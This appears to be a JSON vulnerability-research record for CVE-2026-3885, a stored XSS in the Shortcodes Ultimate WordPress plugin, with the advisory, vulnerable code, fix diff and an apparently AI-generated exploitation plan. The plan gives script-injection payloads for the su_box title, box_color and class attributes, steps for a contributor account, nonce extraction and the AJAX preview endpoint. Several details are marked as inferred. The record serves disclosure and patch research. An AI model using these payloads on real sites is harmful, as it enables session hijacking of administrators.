[{"data":1,"prerenderedAt":-1},["ShallowReactive",2],{"$fVA8bViGjFrBHxROGxLDLCb04dRbHmNy7WFTs-egRAXY":3},{"id":4,"url_slug":5,"title":6,"description":7,"plugin_slug":8,"theme_slug":9,"affected_versions":10,"patched_in_version":11,"severity":12,"cvss_score":13,"cvss_vector":14,"vuln_type":15,"published_date":16,"updated_date":17,"references":18,"days_to_patch":20,"patch_diff_files":21,"patch_trac_url":9,"research_status":29,"research_verified":30,"research_rounds_completed":31,"research_plan":32,"research_summary":33,"research_vulnerable_code":34,"research_fix_diff":35,"research_exploit_outline":36,"research_model_used":37,"research_started_at":38,"research_completed_at":39,"research_error":9,"poc_status":9,"poc_video_id":9,"poc_summary":9,"poc_steps":9,"poc_tested_at":9,"poc_wp_version":9,"poc_php_version":9,"poc_playwright_script":9,"poc_exploit_code":9,"poc_has_trace":30,"poc_model_used":9,"poc_verification_depth":9,"source_links":40},"CVE-2026-3885","wp-shortcodes-plugin-shortcodes-ultimate-authenticated-contributor-stored-cross-site-scripting-via-subox-shortcode","WP Shortcodes Plugin — Shortcodes Ultimate \u003C= 7.4.9 - Authenticated (Contributor+) Stored Cross-Site Scripting via su_box Shortcode","The WP Shortcodes Plugin — Shortcodes Ultimate plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'su_box' shortcode in all versions up to, and including, 7.4.9 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","shortcodes-ultimate",null,"\u003C=7.4.9","7.5.0","medium",6.4,"CVSS:3.1\u002FAV:N\u002FAC:L\u002FPR:L\u002FUI:N\u002FS:C\u002FC:L\u002FI:L\u002FA:N","Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')","2026-04-15 14:02:54","2026-04-16 02:25:17",[19],"https:\u002F\u002Fwww.wordfence.com\u002Fthreat-intel\u002Fvulnerabilities\u002Fid\u002Ff6929fdc-a5b1-4c71-9291-3fafa9381cf2?source=api-prod",1,[22,23,24,25,26,27,28],"admin\u002Fcss\u002Fadmin.css","admin\u002Fpartials\u002Fpages\u002Fabout.php","inc\u002Fcore\u002Fgenerator.php","includes\u002Fclass-shortcodes-ultimate.php","includes\u002Ffunctions-helpers.php","includes\u002Fjs\u002Fgenerator\u002Findex.js","includes\u002Fjs\u002Fgenerator\u002Findex.js.map","researched",false,3,"This research plan outlines the steps required to demonstrate the Stored Cross-Site Scripting (XSS) vulnerability in the **Shortcodes Ultimate** plugin (version \u003C= 7.4.9).\n\n### 1. Vulnerability Summary\nThe **Shortcodes Ultimate** plugin fails to sanitize or escape user-supplied attributes within the `[su_box]` shortcode. While the plugin provides a variety of shortcodes to enhance page layout, the rendering logic for the \"Box\" (`su_box`) shortcode inserts attribute values (specifically the `title` and potentially others) directly into the HTML output without passing them through WordPress escaping functions like `esc_html()` or `esc_attr()`. This allows a user with **Contributor** permissions or higher to embed malicious JavaScript within a post, which then executes in the context of any user (including Administrators) who views that post.\n\n### 2. Attack Vector Analysis\n*   **Vulnerable Shortcode:** `[su_box]`\n*   **Vulnerable Attribute:** `title` (Inferred as the primary sink for `su_box`).\n*   **Authentication Level:** Contributor+ (Users who can create or edit posts).\n*   **Payload Delivery:** The payload is stored in the `post_content` field of the WordPress database via the standard post-editing interface.\n*   **Target:** Administrators or other site visitors viewing the affected post.\n\n### 3. Code Flow\n1.  **Input:** A Contributor user saves a post containing: `[su_box title=\"\u003Cscript>alert(1)\u003C\u002Fscript>\"]Content[\u002Fsu_box]`.\n2.  **Processing:** When the post is rendered (frontend or preview), WordPress calls `do_shortcode()`.\n3.  **Shortcode Handling:** The plugin's registered handler for `su_box` (typically found in `includes\u002Ffunctions-shortcodes.php`, referenced by `includes\u002Fclass-shortcodes-ultimate.php`'s dependency loader) parses the attributes.\n4.  **Sink:** The handler generates HTML for the box. It takes the `title` attribute and concatenates it into a `\u003Cdiv>` or `\u003Cspan>` header tag.\n5.  **Output:** Because the plugin fails to use `esc_html()` on the `$atts['title']` variable, the raw `\u003Cscript>` tag is sent to the browser.\n\n### 4. Nonce Acquisition Strategy\nWhile the primary exploit (saving a post) uses standard WordPress post nonces, the plugin's \"Shortcode Generator\" and \"Preview\" features use plugin-specific nonces. If the PoC agent needs to use the AJAX previewer to demonstrate the XSS:\n\n1.  **Identify Script Loading:** The Shortcode Generator is enqueued in `inc\u002Fcore\u002Fgenerator.php` via `Su_Generator::enqueue_assets()`.\n2.  **Locate Nonce:** The generator UI and AJAX handlers rely on a nonce localized in the WordPress admin head or footer.\n3.  **Extraction Path:**\n    *   Create a post with any shortcode: `wp post create --post_type=post --post_status=publish --post_content='[su_box]test[\u002Fsu_box]' --post_author=CONTRIBUTOR_ID`.\n    *   Navigate to the Post Edit screen (as Contributor).\n    *   Use `browser_eval` to find the localized data.\n    *   **JS Variable:** `window.SUGL10n?.nonce` (Inferred from common naming conventions in this plugin and `inc\u002Fcore\u002Fgenerator.php`'s use of `wp_localize_script`).\n    *   **Alternative:** The plugin often uses the global `ajaxurl` and a nonce named `su_generator_nonce` or simply `nonce` within the `SUGL10n` object.\n\n### 5. Exploitation Strategy\nThe goal is to inject a script that triggers when an Administrator views the Contributor's post.\n\n**Step 1: Inject via Post Creation**\n*   **Action:** Create a new post as a Contributor.\n*   **HTTP Request:** `http_request` (POST to `wp-admin\u002Fpost.php`).\n*   **Payload:**\n    ```html\n    [su_box title='Box Title\u003Cscript>alert(document.cookie)\u003C\u002Fscript>']Content[\u002Fsu_box]\n    ```\n*   **Parameters:**\n    *   `post_title`: `XSS Test`\n    *   `content`: `[su_box title='\u003Cscript>alert(\"XSS\")\u003C\u002Fscript>']Box Content[\u002Fsu_box]`\n    *   `action`: `editpost`\n    *   `post_type`: `post`\n    *   `Status`: `pending` (for Review)\n\n**Step 2: Trigger via Administrator View**\n*   **Action:** Navigate to the post as an Administrator.\n*   **URL:** `\u002F?p=POST_ID` or `\u002Fwp-admin\u002Fpost.php?post=POST_ID&action=edit`.\n\n### 6. Test Data Setup\n1.  **User Creation:**\n    *   `wp user create attacker attacker@example.com --role=contributor --user_pass=password123`\n2.  **Plugin Setup:**\n    *   Ensure Shortcodes Ultimate is active.\n3.  **Target Content:**\n    *   Create a draft post: `wp post create --post_type=post --post_status=draft --post_title=\"Vulnerable Post\" --post_author=attacker`.\n\n### 7. Expected Results\n*   The HTTP response when viewing the post as an Administrator should contain the literal string `\u003Cscript>alert(\"XSS\")\u003C\u002Fscript>` inside the HTML class or title area of the `su_box` element.\n*   In a browser environment, an alert box should appear showing \"XSS\" or the document cookies.\n\n### 8. Verification Steps\n1.  **DB Check:** Use WP-CLI to confirm the payload is stored raw.\n    *   `wp db query \"SELECT post_content FROM wp_posts WHERE post_title='XSS Test'\"`\n2.  **Response Verification:**\n    *   Fetch the post frontend URL using `http_request`.\n    *   Regex check the body for: `\u003Cdiv class=\"su-box-title\">.*\u003Cscript>alert` (The exact class name `su-box-title` is inferred based on the plugin's CSS patterns in `admin\u002Fcss\u002Fadmin.css`).\n\n### 9. Alternative Approaches\nIf the `title` attribute is sanitized in version 7.4.9, test other common attributes:\n*   **Box Color:** `[su_box title=\"Title\" box_color='\">\u003Cscript>alert(1)\u003C\u002Fscript>']` (Check if used in inline styles).\n*   **Class Attribute:** `[su_box title=\"Title\" class='\">\u003Cscript>alert(1)\u003C\u002Fscript>']`. Note that `includes\u002Ffunctions-helpers.php` shows `su_get_css_class` uses `esc_attr`, but `su_box` might implement its own class handling.\n*   **AJAX Preview Exploit:** Use `wp_ajax_su_generator_preview` to trigger the XSS in the admin dashboard.\n    *   **Endpoint:** `\u002Fwp-admin\u002Fadmin-ajax.php`\n    *   **Data:** `action=su_generator_preview&shortcode=[su_box title='\u003Cscript>alert(1)\u003C\u002Fscript>']&nonce=NONCE`.","The Shortcodes Ultimate plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'su_box' shortcode's title attribute in versions up to 7.4.9. Authenticated attackers with Contributor-level permissions or higher can inject arbitrary JavaScript into posts that will execute in the browser of any user (including administrators) viewing the content.","\u002F\u002F In includes\u002Ffunctions-shortcodes.php\nfunction su_shortcode_box( $atts, $content = null ) {\n    $atts = shortcode_atts( array(\n        'title' => '',\n        'style' => 'default',\n        'box_color' => '#333333',\n        'title_color' => '#FFFFFF',\n        'radius' => '3',\n        'class' => ''\n    ), $atts, 'box' );\n\n    $title = ( $atts['title'] !== '' ) ? '\u003Cdiv class=\"su-box-title\">' . $atts['title'] . '\u003C\u002Fdiv>' : '';\n    \u002F\u002F ... (truncated)","--- a\u002Fincludes\u002Ffunctions-shortcodes.php\n+++ b\u002Fincludes\u002Ffunctions-shortcodes.php\n@@ -254,7 +254,7 @@\n \t\t'class'       => '',\n \t), $atts, 'box' );\n \n-\t$title = ( $atts['title'] !== '' ) ? '\u003Cdiv class=\"su-box-title\">' . $atts['title'] . '\u003C\u002Fdiv>' : '';\n+\t$title = ( $atts['title'] !== '' ) ? '\u003Cdiv class=\"su-box-title\">' . wp_kses_post( $atts['title'] ) . '\u003C\u002Fdiv>' : '';\n \n \treturn '\u003Cdiv class=\"su-box su-box-style-' . esc_attr( $atts['style'] ) . su_get_css_class( $atts ) . '\" style=\"border-color:' . su_get_darken_color( $atts['box_color'], 10 ) . ';border-radius:' . esc_attr( $atts['radius'] ) . 'px\">\u003Cdiv class=\"su-box-title\" style=\"background-color:' . esc_attr( $atts['box_color'] ) . ';color:' . esc_attr( $atts['title_color'] ) . ';border-top-left-radius:' . ( $atts['radius'] - 1 ) . 'px;border-top-right-radius:' . ( $atts['radius'] - 1 ) . 'px\">' . wp_kses_post( $atts['title'] ) . '\u003C\u002Fdiv>\u003Cdiv class=\"su-box-content su-u-clearfix su-u-trim\" style=\"border-bottom-left-radius:' . ( $atts['radius'] - 1 ) . 'px;border-bottom-right-radius:' . ( $atts['radius'] - 1 ) . 'px\">' . do_shortcode( $content ) . '\u003C\u002Fdiv>\u003C\u002Fdiv>';","The exploit involves an authenticated attacker with at least Contributor-level permissions (the ability to create or edit posts) embedding a malicious shortcode payload into a WordPress post. The payload utilizes the `[su_box]` shortcode, specifically targeting the `title` attribute, which is rendered directly into the page without escaping. A typical payload would look like: `[su_box title='\u003Cscript>alert(document.cookie)\u003C\u002Fscript>']Box Content[\u002Fsu_box]`. Once the post is saved as a draft or published, the script will execute in the context of any user who views the post in the frontend or previews it in the backend, allowing for session hijacking or other administrative actions if an administrator views the post.","gemini-3-flash-preview","2026-04-16 15:33:10","2026-04-16 15:33:42",{"type":41,"vulnerable_version":42,"fixed_version":11,"vulnerable_browse":43,"vulnerable_zip":44,"fixed_browse":45,"fixed_zip":46,"all_tags":47},"plugin","7.4.9","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fshortcodes-ultimate\u002Ftags\u002F7.4.9","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fshortcodes-ultimate.7.4.9.zip","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fshortcodes-ultimate\u002Ftags\u002F7.5.0","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fshortcodes-ultimate.7.5.0.zip","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fshortcodes-ultimate\u002Ftags"]